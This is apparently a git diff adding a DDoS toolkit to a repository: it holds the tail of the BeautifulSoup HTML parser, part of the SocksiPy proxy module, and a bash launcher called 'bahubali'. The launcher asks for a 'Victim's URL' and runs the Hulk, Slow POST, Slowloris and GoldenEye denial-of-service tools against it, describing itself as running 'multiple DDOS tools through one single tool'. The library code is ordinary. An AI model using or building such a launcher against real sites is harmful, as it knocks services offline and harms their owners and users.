+ currentData = '\n'
+ else:
+ currentData = ' '
+ self.currentData = []
+ if self.parseOnlyThese and len(self.tagStack) <= 1 and \
+ (not self.parseOnlyThese.text or \
+ not self.parseOnlyThese.search(currentData)):
+ return
+ o = containerClass(currentData)
+ o.setup(self.currentTag, self.previous)
+ if self.previous:
+ self.previous.next = o
+ self.previous = o
+ self.currentTag.contents.append(o)
+
+
+ def _popToTag(self, name, inclusivePop=True):
+ """Pops the tag stack up to and including the most recent
+ instance of the given tag. If inclusivePop is false, pops the tag
+        stack up to but *not* including the most recent instance of
+ the given tag."""
+ #print "Popping to %s" % name
+ if name == self.ROOT_TAG_NAME:
+ return
+
+ numPops = 0
+ mostRecentTag = None
+ for i in range(len(self.tagStack)-1, 0, -1):
+ if name == self.tagStack[i].name:
+ numPops = len(self.tagStack)-i
+ break
+ if not inclusivePop:
+ numPops = numPops - 1
+
+ for i in range(0, numPops):
+ mostRecentTag = self.popTag()
+ return mostRecentTag
+
+ def _smartPop(self, name):
+
+ """We need to pop up to the previous tag of this type, unless
+ one of this tag's nesting reset triggers comes between this
+ tag and the previous tag of this type, OR unless this tag is a
+ generic nesting trigger and another generic nesting trigger
+ comes between this tag and the previous tag of this type.
+
+ Examples:
+ <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'.
+ <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'.
+ <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'.
+
+ <li><ul><li> *<li>* should pop to 'ul', not the first 'li'.
+ <tr><table><tr> *<tr>* should pop to 'table', not the first 'tr'
+ <td><tr><td> *<td>* should pop to 'tr', not the first 'td'
+ """
+
+ nestingResetTriggers = self.NESTABLE_TAGS.get(name)
+ isNestable = nestingResetTriggers != None
+ isResetNesting = self.RESET_NESTING_TAGS.has_key(name)
+ popTo = None
+ inclusive = True
+ for i in range(len(self.tagStack)-1, 0, -1):
+ p = self.tagStack[i]
+ if (not p or p.name == name) and not isNestable:
+ #Non-nestable tags get popped to the top or to their
+                #last occurrence.
+ popTo = name
+ break
+ if (nestingResetTriggers != None
+ and p.name in nestingResetTriggers) \
+ or (nestingResetTriggers == None and isResetNesting
+ and self.RESET_NESTING_TAGS.has_key(p.name)):
+
+ #If we encounter one of the nesting reset triggers
+ #peculiar to this tag, or we encounter another tag
+ #that causes nesting to reset, pop up to but not
+ #including that tag.
+ popTo = p.name
+ inclusive = False
+ break
+ p = p.parent
+ if popTo:
+ self._popToTag(popTo, inclusive)
+
+ def unknown_starttag(self, name, attrs, selfClosing=0):
+ #print "Start tag %s: %s" % (name, attrs)
+ if self.quoteStack:
+ #This is not a real tag.
+ #print "<%s> is not real!" % name
+ attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs))
+ self.handle_data('<%s%s>' % (name, attrs))
+ return
+ self.endData()
+
+ if not self.isSelfClosingTag(name) and not selfClosing:
+ self._smartPop(name)
+
+ if self.parseOnlyThese and len(self.tagStack) <= 1 \
+ and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)):
+ return
+
+ tag = Tag(self, name, attrs, self.currentTag, self.previous)
+ if self.previous:
+ self.previous.next = tag
+ self.previous = tag
+ self.pushTag(tag)
+ if selfClosing or self.isSelfClosingTag(name):
+ self.popTag()
+ if name in self.QUOTE_TAGS:
+ #print "Beginning quote (%s)" % name
+ self.quoteStack.append(name)
+ self.literal = 1
+ return tag
+
+ def unknown_endtag(self, name):
+ #print "End tag %s" % name
+ if self.quoteStack and self.quoteStack[-1] != name:
+ #This is not a real end tag.
+ #print "</%s> is not real!" % name
+ self.handle_data('</%s>' % name)
+ return
+ self.endData()
+ self._popToTag(name)
+ if self.quoteStack and self.quoteStack[-1] == name:
+ self.quoteStack.pop()
+ self.literal = (len(self.quoteStack) > 0)
+
+ def handle_data(self, data):
+ self.currentData.append(data)
+
+ def extractCharsetFromMeta(self, attrs):
+ self.unknown_starttag('meta', attrs)
+
+
+class BeautifulSoup(BeautifulStoneSoup):
+
+ """This parser knows the following facts about HTML:
+
+ * Some tags have no closing tag and should be interpreted as being
+ closed as soon as they are encountered.
+
+ * The text inside some tags (ie. 'script') may contain tags which
+ are not really part of the document and which should be parsed
+ as text, not tags. If you want to parse the text as tags, you can
+ always fetch it and parse it explicitly.
+
+ * Tag nesting rules:
+
+    Most tags can't be nested at all. For instance, the occurrence of
+ a <p> tag should implicitly close the previous <p> tag.
+
+ <p>Para1<p>Para2
+ should be transformed into:
+ <p>Para1</p><p>Para2
+
+    Some tags can be nested arbitrarily. For instance, the occurrence
+ of a <blockquote> tag should _not_ implicitly close the previous
+ <blockquote> tag.
+
+ Alice said: <blockquote>Bob said: <blockquote>Blah
+ should NOT be transformed into:
+ Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah
+
+ Some tags can be nested, but the nesting is reset by the
+ interposition of other tags. For instance, a <tr> tag should
+ implicitly close the previous <tr> tag within the same <table>,
+ but not close a <tr> tag in another table.
+
+ <table><tr>Blah<tr>Blah
+ should be transformed into:
+ <table><tr>Blah</tr><tr>Blah
+ but,
+ <tr>Blah<table><tr>Blah
+ should NOT be transformed into
+ <tr>Blah<table></tr><tr>Blah
+
+ Differing assumptions about tag nesting rules are a major source
+ of problems with the BeautifulSoup class. If BeautifulSoup is not
+ treating as nestable a tag your page author treats as nestable,
+ try ICantBelieveItsBeautifulSoup, MinimalSoup, or
+ BeautifulStoneSoup before writing your own subclass."""
+
+ def __init__(self, *args, **kwargs):
+ if not kwargs.has_key('smartQuotesTo'):
+ kwargs['smartQuotesTo'] = self.HTML_ENTITIES
+ kwargs['isHTML'] = True
+ BeautifulStoneSoup.__init__(self, *args, **kwargs)
+
+ SELF_CLOSING_TAGS = buildTagMap(None,
+ ['br' , 'hr', 'input', 'img', 'meta',
+ 'spacer', 'link', 'frame', 'base'])
+
+ PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea'])
+
+ QUOTE_TAGS = {'script' : None, 'textarea' : None}
+
+ #According to the HTML standard, each of these inline tags can
+ #contain another tag of the same type. Furthermore, it's common
+ #to actually use these tags this way.
+ NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup',
+ 'center']
+
+ #According to the HTML standard, these block tags can contain
+ #another tag of the same type. Furthermore, it's common
+ #to actually use these tags this way.
+ NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del']
+
+ #Lists can contain other lists, but there are restrictions.
+ NESTABLE_LIST_TAGS = { 'ol' : [],
+ 'ul' : [],
+ 'li' : ['ul', 'ol'],
+ 'dl' : [],
+ 'dd' : ['dl'],
+ 'dt' : ['dl'] }
+
+ #Tables can contain other tables, but there are restrictions.
+ NESTABLE_TABLE_TAGS = {'table' : [],
+ 'tr' : ['table', 'tbody', 'tfoot', 'thead'],
+ 'td' : ['tr'],
+ 'th' : ['tr'],
+ 'thead' : ['table'],
+ 'tbody' : ['table'],
+ 'tfoot' : ['table'],
+ }
+
+ NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre']
+
+ #If one of these tags is encountered, all tags up to the next tag of
+ #this type are popped.
+ RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript',
+ NON_NESTABLE_BLOCK_TAGS,
+ NESTABLE_LIST_TAGS,
+ NESTABLE_TABLE_TAGS)
+
+ NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS,
+ NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS)
+
+ # Used to detect the charset in a META tag; see start_meta
+ CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M)
+
+ def extractCharsetFromMeta(self, attrs):
+ """Beautiful Soup can detect a charset included in a META tag,
+ try to convert the document to that charset, and re-parse the
+ document from the beginning."""
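+        # A typical tag this method reacts to looks like:
+        #   <meta http-equiv="Content-Type"
+        #         content="text/html; charset=utf-8">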
+ httpEquiv = None
+ contentType = None
+ contentTypeIndex = None
+ tagNeedsEncodingSubstitution = False
+
+ for i in range(0, len(attrs)):
+ key, value = attrs[i]
+ key = key.lower()
+ if key == 'http-equiv':
+ httpEquiv = value
+ elif key == 'content':
+ contentType = value
+ contentTypeIndex = i
+
+ if httpEquiv and contentType: # It's an interesting meta tag.
+ match = self.CHARSET_RE.search(contentType)
+ if match:
+ if (self.declaredHTMLEncoding is not None or
+ self.originalEncoding == self.fromEncoding):
+ # An HTML encoding was sniffed while converting
+ # the document to Unicode, or an HTML encoding was
+ # sniffed during a previous pass through the
+ # document, or an encoding was specified
+ # explicitly and it worked. Rewrite the meta tag.
+ def rewrite(match):
+ return match.group(1) + "%SOUP-ENCODING%"
+ newAttr = self.CHARSET_RE.sub(rewrite, contentType)
+ attrs[contentTypeIndex] = (attrs[contentTypeIndex][0],
+ newAttr)
+ tagNeedsEncodingSubstitution = True
+ else:
+ # This is our first pass through the document.
+ # Go through it again with the encoding information.
+ newCharset = match.group(3)
+ if newCharset and newCharset != self.originalEncoding:
+ self.declaredHTMLEncoding = newCharset
+ self._feed(self.declaredHTMLEncoding)
+ raise StopParsing
+ pass
+ tag = self.unknown_starttag("meta", attrs)
+ if tag and tagNeedsEncodingSubstitution:
+ tag.containsSubstitutions = True
+
+
+class StopParsing(Exception):
+ pass
+
+class ICantBelieveItsBeautifulSoup(BeautifulSoup):
+
+ """The BeautifulSoup class is oriented towards skipping over
+ common HTML errors like unclosed tags. However, sometimes it makes
+ errors of its own. For instance, consider this fragment:
+
+ <b>Foo<b>Bar</b></b>
+
+ This is perfectly valid (if bizarre) HTML. However, the
+ BeautifulSoup class will implicitly close the first b tag when it
+ encounters the second 'b'. It will think the author wrote
+ "<b>Foo<b>Bar", and didn't close the first 'b' tag, because
+ there's no real-world reason to bold something that's already
+ bold. When it encounters '</b></b>' it will close two more 'b'
+ tags, for a grand total of three tags closed instead of two. This
+ can throw off the rest of your document structure. The same is
+ true of a number of other tags, listed below.
+
+ It's much more common for someone to forget to close a 'b' tag
+ than to actually use nested 'b' tags, and the BeautifulSoup class
+    handles the common case. This class handles the not-so-common
+ case: where you can't believe someone wrote what they did, but
+ it's valid HTML and BeautifulSoup screwed up by assuming it
+ wouldn't be."""
+
+ I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \
+ ['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong',
+ 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b',
+ 'big']
+
+ I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript']
+
+ NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS,
+ I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS,
+ I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS)
+
+class MinimalSoup(BeautifulSoup):
+ """The MinimalSoup class is for parsing HTML that contains
+ pathologically bad markup. It makes no assumptions about tag
+ nesting, but it does know which tags are self-closing, that
+ <script> tags contain Javascript and should not be parsed, that
+ META tags may contain encoding information, and so on.
+
+ This also makes it better for subclassing than BeautifulStoneSoup
+ or BeautifulSoup."""
+
+ RESET_NESTING_TAGS = buildTagMap('noscript')
+ NESTABLE_TAGS = {}
+
+class BeautifulSOAP(BeautifulStoneSoup):
+ """This class will push a tag with only a single string child into
+ the tag's parent as an attribute. The attribute's name is the tag
+ name, and the value is the string child. An example should give
+ the flavor of the change:
+
+ <foo><bar>baz</bar></foo>
+ =>
+ <foo bar="baz"><bar>baz</bar></foo>
+
+ You can then access fooTag['bar'] instead of fooTag.barTag.string.
+
+ This is, of course, useful for scraping structures that tend to
+ use subelements instead of attributes, such as SOAP messages. Note
+ that it modifies its input, so don't print the modified version
+ out.
+
+ I'm not sure how many people really want to use this class; let me
+ know if you do. Mainly I like the name."""
+
+ def popTag(self):
+ if len(self.tagStack) > 1:
+ tag = self.tagStack[-1]
+ parent = self.tagStack[-2]
+ parent._getAttrMap()
+ if (isinstance(tag, Tag) and len(tag.contents) == 1 and
+ isinstance(tag.contents[0], NavigableString) and
+ not parent.attrMap.has_key(tag.name)):
+ parent[tag.name] = tag.contents[0]
+ BeautifulStoneSoup.popTag(self)
+
+#Enterprise class names! It has come to our attention that some people
+#think the names of the Beautiful Soup parser classes are too silly
+#and "unprofessional" for use in enterprise screen-scraping. We feel
+#your pain! For such-minded folk, the Beautiful Soup Consortium And
+#All-Night Kosher Bakery recommends renaming this file to
+#"RobustParser.py" (or, in cases of extreme enterprisiness,
+#"RobustParserBeanInterface.class") and using the following
+#enterprise-friendly class aliases:
+class RobustXMLParser(BeautifulStoneSoup):
+ pass
+class RobustHTMLParser(BeautifulSoup):
+ pass
+class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup):
+ pass
+class RobustInsanelyWackAssHTMLParser(MinimalSoup):
+ pass
+class SimplifyingSOAPParser(BeautifulSOAP):
+ pass
+
+######################################################
+#
+# Bonus library: Unicode, Dammit
+#
+# This class forces XML data into a standard format (usually to UTF-8
+# or Unicode). It is heavily based on code from Mark Pilgrim's
+# Universal Feed Parser. It does not rewrite the XML or HTML to
+# reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi
+# (XML) and BeautifulSoup.start_meta (HTML).
+
+# Autodetects character encodings.
+# Download from http://chardet.feedparser.org/
+try:
+ import chardet
+# import chardet.constants
+# chardet.constants._debug = 1
+except ImportError:
+ chardet = None
+
+# cjkcodecs and iconv_codec make Python know about more character encodings.
+# Both are available from http://cjkpython.i18n.org/
+# They're built in if you use Python 2.4.
+try:
+ import cjkcodecs.aliases
+except ImportError:
+ pass
+try:
+ import iconv_codec
+except ImportError:
+ pass
+
+class UnicodeDammit:
+ """A class for detecting the encoding of a *ML document and
+ converting it to a Unicode string. If the source encoding is
+ windows-1252, can replace MS smart quotes with their HTML or XML
+ equivalents."""
+
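+    # A standalone usage sketch:
+    #
+    #   dammit = UnicodeDammit('Sacr\xe9 bleu!')
+    #   dammit.unicode           # -> u'Sacr\xe9 bleu!'
+    #   dammit.originalEncoding  # e.g. 'windows-1252'
+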
+ # This dictionary maps commonly seen values for "charset" in HTML
+ # meta tags to the corresponding Python codec names. It only covers
+ # values that aren't in Python's aliases and can't be determined
+ # by the heuristics in find_codec.
+ CHARSET_ALIASES = { "macintosh" : "mac-roman",
+ "x-sjis" : "shift-jis" }
+
+ def __init__(self, markup, overrideEncodings=[],
+ smartQuotesTo='xml', isHTML=False):
+ self.declaredHTMLEncoding = None
+ self.markup, documentEncoding, sniffedEncoding = \
+ self._detectEncoding(markup, isHTML)
+ self.smartQuotesTo = smartQuotesTo
+ self.triedEncodings = []
+ if markup == '' or isinstance(markup, unicode):
+ self.originalEncoding = None
+ self.unicode = unicode(markup)
+ return
+
+ u = None
+ for proposedEncoding in overrideEncodings:
+ u = self._convertFrom(proposedEncoding)
+ if u: break
+ if not u:
+ for proposedEncoding in (documentEncoding, sniffedEncoding):
+ u = self._convertFrom(proposedEncoding)
+ if u: break
+
+ # If no luck and we have auto-detection library, try that:
+ if not u and chardet and not isinstance(self.markup, unicode):
+ u = self._convertFrom(chardet.detect(self.markup)['encoding'])
+
+ # As a last resort, try utf-8 and windows-1252:
+ if not u:
+ for proposed_encoding in ("utf-8", "windows-1252"):
+ u = self._convertFrom(proposed_encoding)
+ if u: break
+
+ self.unicode = u
+ if not u: self.originalEncoding = None
+
+ def _subMSChar(self, match):
+ """Changes a MS smart quote character to an XML or HTML
+ entity."""
+ orig = match.group(1)
+ sub = self.MS_CHARS.get(orig)
+ if type(sub) == types.TupleType:
+ if self.smartQuotesTo == 'xml':
+ sub = '&#x'.encode() + sub[1].encode() + ';'.encode()
+ else:
+ sub = '&'.encode() + sub[0].encode() + ';'.encode()
+ else:
+ sub = sub.encode()
+ return sub
+
+ def _convertFrom(self, proposed):
+ proposed = self.find_codec(proposed)
+ if not proposed or proposed in self.triedEncodings:
+ return None
+ self.triedEncodings.append(proposed)
+ markup = self.markup
+
+ # Convert smart quotes to HTML if coming from an encoding
+ # that might have them.
+        if self.smartQuotesTo and proposed.lower() in ("windows-1252",
+                                                       "iso-8859-1",
+                                                       "iso-8859-2"):
+ smart_quotes_re = "([\x80-\x9f])"
+ smart_quotes_compiled = re.compile(smart_quotes_re)
+ markup = smart_quotes_compiled.sub(self._subMSChar, markup)
+
+ try:
+ # print "Trying to convert document to %s" % proposed
+ u = self._toUnicode(markup, proposed)
+ self.markup = u
+ self.originalEncoding = proposed
+ except Exception, e:
+ # print "That didn't work!"
+ # print e
+ return None
+ #print "Correct encoding: %s" % proposed
+ return self.markup
+
+ def _toUnicode(self, data, encoding):
+ '''Given a string and its encoding, decodes the string into Unicode.
+ %encoding is a string recognized by encodings.aliases'''
+
+ # strip Byte Order Mark (if present)
+ if (len(data) >= 4) and (data[:2] == '\xfe\xff') \
+ and (data[2:4] != '\x00\x00'):
+ encoding = 'utf-16be'
+ data = data[2:]
+ elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \
+ and (data[2:4] != '\x00\x00'):
+ encoding = 'utf-16le'
+ data = data[2:]
+ elif data[:3] == '\xef\xbb\xbf':
+ encoding = 'utf-8'
+ data = data[3:]
+ elif data[:4] == '\x00\x00\xfe\xff':
+ encoding = 'utf-32be'
+ data = data[4:]
+ elif data[:4] == '\xff\xfe\x00\x00':
+ encoding = 'utf-32le'
+ data = data[4:]
+ newdata = unicode(data, encoding)
+ return newdata
+
+ def _detectEncoding(self, xml_data, isHTML=False):
+ """Given a document, tries to detect its XML encoding."""
+ xml_encoding = sniffed_xml_encoding = None
+ try:
+ if xml_data[:4] == '\x4c\x6f\xa7\x94':
+ # EBCDIC
+ xml_data = self._ebcdic_to_ascii(xml_data)
+ elif xml_data[:4] == '\x00\x3c\x00\x3f':
+ # UTF-16BE
+ sniffed_xml_encoding = 'utf-16be'
+ xml_data = unicode(xml_data, 'utf-16be').encode('utf-8')
+ elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \
+ and (xml_data[2:4] != '\x00\x00'):
+ # UTF-16BE with BOM
+ sniffed_xml_encoding = 'utf-16be'
+ xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8')
+ elif xml_data[:4] == '\x3c\x00\x3f\x00':
+ # UTF-16LE
+ sniffed_xml_encoding = 'utf-16le'
+ xml_data = unicode(xml_data, 'utf-16le').encode('utf-8')
+ elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \
+ (xml_data[2:4] != '\x00\x00'):
+ # UTF-16LE with BOM
+ sniffed_xml_encoding = 'utf-16le'
+ xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8')
+ elif xml_data[:4] == '\x00\x00\x00\x3c':
+ # UTF-32BE
+ sniffed_xml_encoding = 'utf-32be'
+ xml_data = unicode(xml_data, 'utf-32be').encode('utf-8')
+ elif xml_data[:4] == '\x3c\x00\x00\x00':
+ # UTF-32LE
+ sniffed_xml_encoding = 'utf-32le'
+ xml_data = unicode(xml_data, 'utf-32le').encode('utf-8')
+ elif xml_data[:4] == '\x00\x00\xfe\xff':
+ # UTF-32BE with BOM
+ sniffed_xml_encoding = 'utf-32be'
+ xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8')
+ elif xml_data[:4] == '\xff\xfe\x00\x00':
+ # UTF-32LE with BOM
+ sniffed_xml_encoding = 'utf-32le'
+ xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8')
+ elif xml_data[:3] == '\xef\xbb\xbf':
+ # UTF-8 with BOM
+ sniffed_xml_encoding = 'utf-8'
+ xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8')
+ else:
+ sniffed_xml_encoding = 'ascii'
+ pass
+ except:
+ xml_encoding_match = None
+ xml_encoding_re = '^<\?.*encoding=[\'"](.*?)[\'"].*\?>'.encode()
+ xml_encoding_match = re.compile(xml_encoding_re).match(xml_data)
+ if not xml_encoding_match and isHTML:
+ meta_re = '<\s*meta[^>]+charset=([^>]*?)[;\'">]'.encode()
+ regexp = re.compile(meta_re, re.I)
+ xml_encoding_match = regexp.search(xml_data)
+ if xml_encoding_match is not None:
+ xml_encoding = xml_encoding_match.groups()[0].decode(
+ 'ascii').lower()
+ if isHTML:
+ self.declaredHTMLEncoding = xml_encoding
+ if sniffed_xml_encoding and \
+ (xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode',
+ 'iso-10646-ucs-4', 'ucs-4', 'csucs4',
+ 'utf-16', 'utf-32', 'utf_16', 'utf_32',
+ 'utf16', 'u16')):
+ xml_encoding = sniffed_xml_encoding
+ return xml_data, xml_encoding, sniffed_xml_encoding
+
+
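+    # find_codec normalizes a charset name to one Python's codec registry
+    # recognizes; e.g., via CHARSET_ALIASES above,
+    # find_codec("macintosh") returns "mac-roman".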
+ def find_codec(self, charset):
+ return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \
+ or (charset and self._codec(charset.replace("-", ""))) \
+ or (charset and self._codec(charset.replace("-", "_"))) \
+ or charset
+
+ def _codec(self, charset):
+ if not charset: return charset
+ codec = None
+ try:
+ codecs.lookup(charset)
+ codec = charset
+ except (LookupError, ValueError):
+ pass
+ return codec
+
+ EBCDIC_TO_ASCII_MAP = None
+ def _ebcdic_to_ascii(self, s):
+ c = self.__class__
+ if not c.EBCDIC_TO_ASCII_MAP:
+ emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15,
+ 16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31,
+ 128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7,
+ 144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26,
+ 32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33,
+ 38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94,
+ 45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63,
+ 186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34,
+ 195,97,98,99,100,101,102,103,104,105,196,197,198,199,200,
+ 201,202,106,107,108,109,110,111,112,113,114,203,204,205,
+ 206,207,208,209,126,115,116,117,118,119,120,121,122,210,
+ 211,212,213,214,215,216,217,218,219,220,221,222,223,224,
+ 225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72,
+ 73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81,
+ 82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89,
+ 90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57,
+ 250,251,252,253,254,255)
+ import string
+ c.EBCDIC_TO_ASCII_MAP = string.maketrans( \
+ ''.join(map(chr, range(256))), ''.join(map(chr, emap)))
+ return s.translate(c.EBCDIC_TO_ASCII_MAP)
+
+ MS_CHARS = { '\x80' : ('euro', '20AC'),
+ '\x81' : ' ',
+ '\x82' : ('sbquo', '201A'),
+ '\x83' : ('fnof', '192'),
+ '\x84' : ('bdquo', '201E'),
+ '\x85' : ('hellip', '2026'),
+ '\x86' : ('dagger', '2020'),
+ '\x87' : ('Dagger', '2021'),
+ '\x88' : ('circ', '2C6'),
+ '\x89' : ('permil', '2030'),
+ '\x8A' : ('Scaron', '160'),
+ '\x8B' : ('lsaquo', '2039'),
+ '\x8C' : ('OElig', '152'),
+ '\x8D' : '?',
+ '\x8E' : ('#x17D', '17D'),
+ '\x8F' : '?',
+ '\x90' : '?',
+ '\x91' : ('lsquo', '2018'),
+ '\x92' : ('rsquo', '2019'),
+ '\x93' : ('ldquo', '201C'),
+ '\x94' : ('rdquo', '201D'),
+ '\x95' : ('bull', '2022'),
+ '\x96' : ('ndash', '2013'),
+ '\x97' : ('mdash', '2014'),
+ '\x98' : ('tilde', '2DC'),
+ '\x99' : ('trade', '2122'),
+ '\x9a' : ('scaron', '161'),
+ '\x9b' : ('rsaquo', '203A'),
+ '\x9c' : ('oelig', '153'),
+ '\x9d' : '?',
+ '\x9e' : ('#x17E', '17E'),
+ '\x9f' : ('Yuml', ''),}
+
+#######################################################################
+
+
+#By default, act as an HTML pretty-printer.
+if __name__ == '__main__':
+ import sys
+ soup = BeautifulSoup(sys.stdin)
+ print soup.prettify()
diff --git a/src/BeautifulSoup.pyc b/src/BeautifulSoup.pyc
new file mode 100644
index 0000000..9f0acae
--- /dev/null
+++ b/src/BeautifulSoup.pyc
Binary files differ
diff --git a/src/bahubali b/src/bahubali
new file mode 100644
index 0000000..ed1b87d
--- /dev/null
+++ b/src/bahubali
@@ -0,0 +1,99 @@
+#!/bin/bash
+#set -x
+cat << "ASCII"
+
+
+ ____ _ _ _ _
+ | _ \ | | | | | (_)
+ | |_) | __ _| |__ _ _| |__ __ _| |_
+ | _ < / _` | '_ \| | | | '_ \ / _` | | |
+ | |_) | (_| | | | | |_| | |_) | (_| | | |
+ |____/ \__,_|_| |_|\__,_|_.__/ \__,_|_|_|
+
+
+
+
+ASCII
+echo "Enter the Victim's URL with http:/https:"
+read url
+
+while [[ ! $url =~ https?:// ]]; do
+ read -p "You have not used HTTP or HTTPS, Please Enter Again else the tools wont work. Enter Again : " url
+
+done
+#echo "Reaches Here"
+read F
+clear
+function menu() {
+echo "Victim's URL is $url"
+echo "Choose any option"
+echo "(1) Hulk"
+echo "(2) Slow Post DoS"
+echo "(3) SlowORis"
+echo "(4) GoldenEye"
+echo "(5) About Bahubali"
+echo "(6) Exit"
+read -p "Enter the option number : " option
+while [[ $option -lt 1 || $option -gt 6 ]]; do
+ read -p "Invalid Input, Please Enter Again : " option
+done
+return $option
+}
+menu "$url" $option
+echo "Your selected option is $option"
+read -n1 -r -p "Press any key to continue..." key
+if [ $option -eq 1 ]; then
+clear
+echo "Press Enter to Begin Hulk Atack"
+read fun
+clear
+python hulk.py $url
+
+elif [ $option -eq 2 ]; then
+clear
+echo "Enter the no of threads eg 256"
+read threadst
+clear
+echo "enter the web server port eg 80"
+read portt
+clear
+echo "Press Enter to Begin Attack"
+read funt
+clear
+python 2.py -t $url -r $threadst -p $portt -T
+elif [ $option -eq 3 ]; then
+clear
+echo "May The Force Be With You"
+echo "Press Enter to Attack"
+read fun
+perl 3.pl -dns $url -options
+elif [ $option -eq 4 ]; then
+echo "007 Attack starting"
+echo "Under Heavy Testing would not work"
+echo "GoldenEye Attack initiated"
+read fun
+python goldeneye.py $url
+elif [ $option -eq 6 ]; then
+echo "GoodBye"
+exit
+elif [ $option -eq 5 ]; then
+clear
+echo "ONE TOOL TO RULE THEM ALL"
+cat << "A"
+
+
+ ____ _ _ _ _
+ | _ \ | | | | | (_)
+ | |_) | __ _| |__ _ _| |__ __ _| |_
+ | _ < / _` | '_ \| | | | '_ \ / _` | | |
+ | |_) | (_| | | | | |_| | |_) | (_| | | |
+ |____/ \__,_|_| |_|\__,_|_.__/ \__,_|_|_|
+
+
+
+
+A
+echo "Bahubali is a tool which allows you to execute any one of the multiple DDOS tools through one single tool"
+
+read about
+fi
diff --git a/src/socks.py b/src/socks.py
new file mode 100644
index 0000000..7cc1bc3
--- /dev/null
+++ b/src/socks.py
@@ -0,0 +1,387 @@
+"""SocksiPy - Python SOCKS module.
+Version 1.00
+
+Copyright 2006 Dan-Haim. All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification,
+are permitted provided that the following conditions are met:
+1. Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+3. Neither the name of Dan Haim nor the names of his contributors may be used
+ to endorse or promote products derived from this software without specific
+ prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED
+WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
+EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA
+OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+This module provides a standard socket-like interface for Python
+for tunneling connections through SOCKS proxies.
+
+"""
+
+import socket
+import struct
+
+PROXY_TYPE_SOCKS4 = 1
+PROXY_TYPE_SOCKS5 = 2
+PROXY_TYPE_HTTP = 3
+
+_defaultproxy = None
+_orgsocket = socket.socket
+
+class ProxyError(Exception):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class GeneralProxyError(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class Socks5AuthError(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class Socks5Error(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class Socks4Error(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class HTTPError(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+_generalerrors = ("success",
+ "invalid data",
+ "not connected",
+ "not available",
+ "bad proxy type",
+ "bad input")
+
+_socks5errors = ("succeeded",
+ "general SOCKS server failure",
+ "connection not allowed by ruleset",
